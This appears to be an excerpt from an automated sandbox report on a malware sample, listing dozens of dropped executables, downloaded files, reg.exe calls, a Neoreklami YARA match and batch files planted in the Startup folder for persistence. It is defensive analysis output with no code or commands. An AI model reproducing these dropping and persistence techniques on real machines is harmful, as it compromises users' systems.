Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\IzXa7ArplEUILx8JLGVvIms1.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\iWX2pBM7OP8AKRlxpYxKCjxp.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\JJ5skLlHHCJQmKA3fqFEF8WX.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\7uuYOubuRuTeu2Z5aoCcHRqr.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\Dwkvj_9aXUK5SRV0uUMfzWFw.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\1j9R8lifNJQPOos8jChy96bC.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\rKeuCT5BtcDJi3xnRhdYBXJ0.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\8uJfLKd9Ss22grd4NZfs8ESc.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\sCKRGnz9ufcbydLPdvMHEgfk.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\Vv3eq95tJE23PC8aGlGuTOwU.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\xCrl2X_yjihZJLjlfNXcaGsm.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\GLt6qc3E5xlMIXJ9xyvvME0a.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\0xzSXfvcS_VEarTqOdaPs4ts.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\949yVhltZoP9AEITjUlYclGY.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\3jK_1xVb8VV_A9ZblPqH0VLP.exe	Jump to dropped file

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\JEeghWLvEc5NBgQe7cVxX86V.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\JRER40VeoC2Q4ducOjAkB8be.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\wPxPcov2_iRQt91bGzfyQLn0.exe	Jump to dropped file
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	File created: C:\Users\user\Pictures\360TS_Setup.exe (copy)	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\zl9WjeKTxMy8k8EbTBZdpElC.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\VEH3hOo7SH8Curivn14XA2XL.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\cbVkxkkdr6gAwr3ezrvUlIvw.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\oiii[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Default15_s[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\QAuG4M9OCXilplKuXEar6ygd.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\oZEH3cHEU5SysFjbUbbRDrah.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\0xzSXfvcS_VEarTqOdaPs4ts.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\GEHqSaIn1rPu3OTaMO2vs7UL.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\o2i3jroi23joj23ikrjokij3oroi[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\zPFKv97tg3hm10kOTWpULC1K.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\5FLQaCVJzPf4A255tfj9dVCh.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\8RYSoZQFK6V9LYpTMM1le7yQ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\j19ppip6hQlQefTQJUWb1E5Y.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\3wIIRe1QiHmGmyDfkt1MdfjR.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\Dwkvj_9aXUK5SRV0uUMfzWFw.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\04MMWMll6oQNYP44niQAKG8f.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\iMXraNxDRLg4aVOpMn3cNrIf.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\gsV4lhPLd9AgpTxUWWWokC1J.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\timeSync[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\xCrl2X_yjihZJLjlfNXcaGsm.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\iuDvaF9Di8V3GPfVdVsLOQc6.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\CwXesQHbkmvSYkF54FDCGs0u.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\IMmyv1eSkv8WoF4sKRLh3j87.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\2nhKzHIgDWCzStH9EAQv4dqj.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\default_s[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\vzNIVOaxf0vNgO94DAC9jWgi.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\crt[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File created: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\bash.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\b7ii2eIKHIFqIN8jVgqT5jFD.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\1j9R8lifNJQPOos8jChy96bC.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\4lBshxehGejQoegWUuOtgGGK.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\setup[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\Vv3eq95tJE23PC8aGlGuTOwU.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\ED0F.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\949yVhltZoP9AEITjUlYclGY.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\O6FJxszjCn1zgUzc3ngkew5Q.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\PkqGBlFfXQGSePxTvCIfv7cw.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\xCvbsgibKaoe0JrKdFZUHTO3.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\iWX2pBM7OP8AKRlxpYxKCjxp.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\H0hJPxhIO3F6BQNxVzuoHmfd.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\EXHYoUWbk2EtGfzPiFxOh4fX.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\gX97xQ1DxOEiWzmKIb4DOJWg.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\KFwijURKZUrjToqwGsuVqcsD.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Retailer_prog[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\Lxz6buRp1tzgPd3mYM1t5mGJ.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\GLt6qc3E5xlMIXJ9xyvvME0a.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\A6Q2KMdnce3aBm1K21Xc0zdR.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\niko[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	File created: C:\Users\user\AppData\Local\Temp\{F0567900-3BBD-4439-A130-BA90A759BDE5}.tmp\360P2SP.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\oabRgCI78gjFIFXr0JEwCrFT.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\hvfsedh	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\i3ScmbyFMAYvi3d3SI8x4eUU.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\rCs1RclDFMYQLymrwE3zboPd.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\123p[1].exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\FFE8.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\AFlhDPRBYXSdsXlIscLwpPBI.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\IzXa7ArplEUILx8JLGVvIms1.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\qoBVbpyFWm3cPk1EQ0W4FQFR.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\PBZVagSpvy50LOBQHCjW6qX9.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\Y01cK2OJgtSKgzCj2OAQkixL.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\7uuYOubuRuTeu2Z5aoCcHRqr.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\oNUrhYTToLZiF7IoGm0L0Ir9.exe	Jump to dropped file
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File created: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\notepad.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\z7qYuSNnmN1T20mVDPQyJKNf.exe	Jump to dropped file
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	File created: C:\Users\user\Pictures\360TS_Setup.exe.P2P	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\XxYZdepnteJj9ehuEwVshtV3.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\pkc9Yy7eyXDNxjrdaLkXC1Nw.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\eVDrCR1hP70QTfLbRAKhpUOl.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\hmtNBhlQWScQGAc2r9fH2laz.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\3jK_1xVb8VV_A9ZblPqH0VLP.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\M5ZhHB9e1LKNIZlvmmjrpriI.exe	Jump to dropped file
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File created: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\atieah64.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\JJ5skLlHHCJQmKA3fqFEF8WX.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\8ew1ueXT5mhwmZG4bTyHf7GY.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\m1SrljFNqYeH3vArtbYAaVjK.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\COdFyPiBcHZ6gr6RgSEauTsj.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\xHjBfoMXM1Bms4i9lirVpf5B.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\TZazqzIjmIm4XQvcJYbdkOMa.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\DYOHZPW0D22LInRRNxYgymyV.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\w0LUzqfajtYxxu1NAEZFwfRY.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\v0F2dmnMQ8GuOxPTeGs09I9Y.exe	Jump to dropped file
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	File created: C:\Users\user\lgX7lgUL1w.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\8uJfLKd9Ss22grd4NZfs8ESc.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\bVGflEGYToK4vU6iMb86uQ6v.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\sCKRGnz9ufcbydLPdvMHEgfk.exe	Jump to dropped file
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File created: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\auditpol.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\o3bvuCFHWJf8oEmP3T0jhkMM.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\setup294[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\SMjkjKVfovgJQv0DVgLWunVz.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\Y8VzUT8xWp3WAsPKChchuKQ1.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\6up3Hll278RsXeDsUnv7AmsU.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\OZYSp_SuS64TdEhCce9XJabD.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\LAD11vkv57kHfnlhAFxxWdEz.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\aqGWEPmkK0B9sJyfEBtpOpuJ.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\rKeuCT5BtcDJi3xnRhdYBXJ0.exe	Jump to dropped file
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File created: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\jRw9sx4Ek0t13Tr93vMM8tJ1.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\JRzNWYaVkGhoqBVKINyNWHZb.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\ByzLwX6bBzV9uMer6vLaibLq.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\oURwiane2EFilQ46IVStlZR3.exe	Jump to dropped file

Drops PE files to the user directory

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe

File created: C:\Users\user\lgX7lgUL1w.exe

Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	File created: C:\Users\user\Pictures\360TS_Setup.exe.P2P			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\hvfsedh			Jump to dropped file

Boot Survival

Yara detected Neoreklami

Source: Yara match

File source: Process Memory Space: Install.exe PID: 8020, type: MEMORYSTR

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe

File created: C:\Users\user\lgX7lgUL1w.exe

Jump to dropped file

Drops script or batch files to the startup folder

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CpI1BxUwX4GXv0UQgqj98YFq.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dH9ICyXokcwnq5IDiow3vkKB.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1Ub2k1IJ2t5gUNZveaJnsLim.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lfz7DVXioZ89NNQKMlyzk5D1.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uM7NrUar2CHMPPLhTaEGJaiv.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9KovXimwlIyW3P77uFXo41ye.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TH2edQjI5N96cctLqxcxRWB4.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tEJmB2nPjyQy45rj4ea5hhl3.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lRYDXj1XORWa1yGwgqL1xUtR.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xInHqHgRkuPGfp5esHw9Po4t.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BsDz5LTErOmd8yNfyBTmMVUZ.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Gov6rjgDZRJhjjWExECEmd4R.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsh82zoYXoBpPEndu5XVvQbj.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fDdDwjmSMhosQx3rLX3Nv89G.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mttZ30v22cES8SbTv1OgQiYx.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tYY0jrXY77oGwO5gH1VTslTu.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ixTCqmFJu5C2WAuYjLa75esH.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bzhtqiaIEnooSzQ58KPkDsXr.bat	Jump to dropped file
